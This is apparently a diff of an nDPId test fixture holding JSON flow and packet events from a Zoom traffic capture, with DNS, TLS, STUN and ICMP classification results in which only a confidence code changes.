-00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"zoom.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520468922,"flow_last_seen":1569520468922,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1569520468922,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":64352,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"},"dns": {"query":"log.zoom.us","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"zoom.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520468922,"flow_last_seen":1569520468922,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1569520468922,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":64352,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"},"dns": {"query":"log.zoom.us","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"zoom.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1569520468958,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":87,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":87,"pkt_l4_len":53,"thread_ts_msec":1569520468958,"pkt":"KDc3AG3IEBMx8Tl2CABFAABJ++kAADcRA\/TAqAEBwKgBdQA1+2AANbDee1+BgAABAAEAAAAAA2xvZwR6b29tAnVzAAABAAHADAABAAEAAAA8AAQ0yj7u"} -00776{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":24,"source":"zoom.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569520468922,"flow_last_seen":1569520468958,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":74,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1569520468958,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":64352,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"},"dns": {"query":"log.zoom.us","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.202.62.238"}} +00776{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":24,"source":"zoom.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569520468922,"flow_last_seen":1569520468958,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":74,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1569520468958,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":64352,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"},"dns": {"query":"log.zoom.us","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.202.62.238"}} 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":25,"source":"zoom.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520468959,"flow_last_seen":1569520468959,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569520468959,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.238","src_port":54864,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"zoom.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1569520468959,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569520468959,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGBOPAqAF1NMo+7tZQAbuf1vAbAAAAALAC\/\/+Z4QAAAgQFtAEDAwUBAQgKJZzZqwAAAAAEAgAA"} 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"zoom.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469036,"flow_last_seen":1569520469036,"flow_idle_time":200000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":23,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1569520469036,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":65394,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"zoom.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1569520469036,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":65,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":65,"pkt_l4_len":31,"thread_ts_msec":1569520469036,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAzKPoAAP8RDvnAqAF1wKgBAf9yADUAH9x7wYgBAAABAAAAAAAABWxvY2FsAAAGAAE="} -00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":26,"source":"zoom.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469036,"flow_last_seen":1569520469036,"flow_idle_time":200000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":23,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1569520469036,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":65394,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"local","num_queries":0,"num_answers":0,"reply_code":0,"query_type":6,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":26,"source":"zoom.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469036,"flow_last_seen":1569520469036,"flow_idle_time":200000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":23,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1569520469036,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":65394,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"local","num_queries":0,"num_answers":0,"reply_code":0,"query_type":6,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"zoom.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1569520469067,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569520469067,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0AABAAO4GVu40yj7uwKgBdQG71lCVbT6Un9bwHIASaQOUKgAAAgQFrAEBBAIBAwMM"} 00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"zoom.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1569520469067,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1569520469067,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGBPvAqAF1NMo+7tZQAbuf1vAclW0+lVAQIAAd\/QAA"} 00565{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"zoom.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1569520469072,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":140,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":140,"pkt_l4_len":106,"thread_ts_msec":1569520469072,"pkt":"KDc3AG3IEBMx8Tl2CABFAAB+D5oAADcR8A7AqAEBwKgBdQA1\/3IAaoTewYiBgwABAAAAAQAABWxvY2FsAAAGAAEAAAYAAQAACY8AQAFhDHJvb3Qtc2VydmVycwNuZXQABW5zdGxkDHZlcmlzaWduLWdycwNjb20AeFjoeAAABwgAAAOEAAk6gAABUYA="} -00762{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":29,"source":"zoom.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569520469036,"flow_last_seen":1569520469072,"flow_idle_time":200000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":121,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1569520469072,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":65394,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"local","num_queries":1,"num_answers":1,"reply_code":3,"query_type":6,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00762{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":29,"source":"zoom.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569520469036,"flow_last_seen":1569520469072,"flow_idle_time":200000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":121,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1569520469072,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":65394,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"local","num_queries":1,"num_answers":1,"reply_code":3,"query_type":6,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00545{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":30,"source":"zoom.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469072,"flow_last_seen":1569520469072,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1569520469072,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"zoom.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1569520469072,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1569520469072,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA4d+0AAEABfxHAqAF1wKgBAQMD\/OoAAAAARQAAfg+aAAA3EfAOwKgBAcCoAXUANf9yAGoAAA=="} -00623{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":30,"source":"zoom.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469072,"flow_last_seen":1569520469072,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1569520469072,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":3.637537} +00623{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":30,"source":"zoom.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469072,"flow_last_seen":1569520469072,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1569520469072,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","l4_proto":"icmp","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":3.637537} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":31,"source":"zoom.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469081,"flow_last_seen":1569520469081,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569520469081,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"13.225.84.182","src_port":54798,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"zoom.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1569520469081,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1569520469081,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAog\/0AAEAG0h7AqAF1DeFUttYOAbuSOQajVAdu1VAQECZHdwAA"} -00838{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":32,"source":"zoom.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569520468959,"flow_last_seen":1569520469090,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569520469090,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.238","src_port":54864,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"log.zoom.us","ja3":"535aca3d99fc247509cd50933cd71d37","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} +00838{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":32,"source":"zoom.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569520468959,"flow_last_seen":1569520469090,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569520469090,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.238","src_port":54864,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"log.zoom.us","ja3":"535aca3d99fc247509cd50933cd71d37","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"zoom.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1569520469116,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1569520469116,"pkt":"KDc3AG3IEBMx8Tl2CABFAAAoaEVAAO8G\/tUN4VS2wKgBdQG71g5UB27VAAAAAFAEAADwhQAAAAAAAAAA"} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":34,"source":"zoom.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469189,"flow_last_seen":1569520469189,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1569520469189,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"162.255.37.14","src_port":23903,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"zoom.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1569520469189,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1569520469189,"pkt":"EBMx8Tl2KDc3AG3ICABFAABICu4AAEAR5YzAqAF1ov8lDl1fDZYANPtTAAEAGMFdrmNYXRQ5LlgsJgQDvzABAQAUMTIzNDU2Nzg5MDEyMzQ1Njc4OQA="} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"zoom.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1569520469200,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1569520469200,"pkt":"EBMx8Tl2KDc3AG3ICABFAABISukAAEARpZHAqAF1ov8lDl1fDZYANPtTAAEAGMFdrmNYXRQ5LlgsJgQDvzABAQAUMTIzNDU2Nzg5MDEyMzQ1Njc4OQA="} -00894{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":37,"source":"zoom.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520468959,"flow_last_seen":1569520469200,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1969,"flow_avg_l4_payload_len":328,"midstream":0,"thread_ts_msec":1569520469200,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.238","src_port":54864,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"log.zoom.us","ja3":"535aca3d99fc247509cd50933cd71d37","ja3s":"3c30f2c064a3aed8cd95de8d68c726a6","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} -01219{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":41,"source":"zoom.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1569520468959,"flow_last_seen":1569520469201,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6125,"flow_avg_l4_payload_len":612,"midstream":0,"thread_ts_msec":1569520469201,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.238","src_port":54864,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"log.zoom.us","server_names":"*.zoom.us,zoom.us","ja3":"535aca3d99fc247509cd50933cd71d37","ja3s":"3c30f2c064a3aed8cd95de8d68c726a6","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - G2","subjectDN":"OU=Domain Control Validated, CN=*.zoom.us","alpn":"http\/1.1","fingerprint":"F7:5A:83:A8:77:24:55:D7:6D:2E:93:F6:6E:9C:C9:7E:AD:9B:3B:E8"}} +00894{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":37,"source":"zoom.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520468959,"flow_last_seen":1569520469200,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1969,"flow_avg_l4_payload_len":328,"midstream":0,"thread_ts_msec":1569520469200,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.238","src_port":54864,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"log.zoom.us","ja3":"535aca3d99fc247509cd50933cd71d37","ja3s":"3c30f2c064a3aed8cd95de8d68c726a6","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} +01219{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":41,"source":"zoom.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1569520468959,"flow_last_seen":1569520469201,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6125,"flow_avg_l4_payload_len":612,"midstream":0,"thread_ts_msec":1569520469201,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.238","src_port":54864,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"log.zoom.us","server_names":"*.zoom.us,zoom.us","ja3":"535aca3d99fc247509cd50933cd71d37","ja3s":"3c30f2c064a3aed8cd95de8d68c726a6","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - G2","subjectDN":"OU=Domain Control Validated, CN=*.zoom.us","alpn":"http\/1.1","fingerprint":"F7:5A:83:A8:77:24:55:D7:6D:2E:93:F6:6E:9C:C9:7E:AD:9B:3B:E8"}} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"zoom.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1569520469210,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1569520469210,"pkt":"EBMx8Tl2KDc3AG3ICABFAABIjkkAAEARYjHAqAF1ov8lDl1fDZYANPtTAAEAGMFdrmNYXRQ5LlgsJgQDvzABAQAUMTIzNDU2Nzg5MDEyMzQ1Njc4OQA="} -00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":44,"source":"zoom.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1569520469189,"flow_last_seen":1569520469210,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1569520469210,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"162.255.37.14","src_port":23903,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.Zoom","breed":"Acceptable","category":"Video"}} +00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":44,"source":"zoom.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1569520469189,"flow_last_seen":1569520469210,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1569520469210,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"162.255.37.14","src_port":23903,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.Zoom","breed":"Acceptable","category":"Video"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":46,"source":"zoom.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469221,"flow_last_seen":1569520469221,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1569520469221,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"162.255.38.14","src_port":23903,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"zoom.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1569520469221,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1569520469221,"pkt":"EBMx8Tl2KDc3AG3ICABFAABI9l0AAEAR+RzAqAF1ov8mDl1fDZYANPpTAAEAGMFdrmNYXRQ5LlgsJgQDvzABAQAUMTIzNDU2Nzg5MDEyMzQ1Njc4OQA="} -00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"zoom.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469221,"flow_last_seen":1569520469221,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1569520469221,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"162.255.38.14","src_port":23903,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.Zoom","breed":"Acceptable","category":"Video"}} +00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"zoom.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469221,"flow_last_seen":1569520469221,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1569520469221,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"162.255.38.14","src_port":23903,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.Zoom","breed":"Acceptable","category":"Video"}} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"zoom.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1569520469231,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1569520469231,"pkt":"EBMx8Tl2KDc3AG3ICABFAABIQ9kAAEARq6HAqAF1ov8mDl1fDZYANPpTAAEAGMFdrmNYXRQ5LlgsJgQDvzABAQAUMTIzNDU2Nzg5MDEyMzQ1Njc4OQA="} 